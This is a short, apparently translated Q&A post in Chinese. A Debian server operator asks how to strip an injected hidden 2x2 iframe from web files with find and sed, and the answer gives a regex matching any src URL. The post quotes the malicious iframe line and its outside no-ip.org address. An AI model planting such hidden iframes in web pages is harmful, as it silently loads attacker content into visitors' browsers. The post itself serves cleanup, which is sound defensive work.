我们正在运行一个Debian服务器,我们有一个恶意软件或其他代码注入。
我知道如何search和replace这个string:
<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe> 我这样做:
find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'
我的问题是urlhttp://ingvar2000.no-ip.org/jc/rss.php从文件更改为文件,所以我如何search和replace:
<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>
因为宽度,高度和frameborder总是相同的。
使用
find /home -type f | xargs sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'
这里[^"]*表示0以外的任何东西的更多字符" 。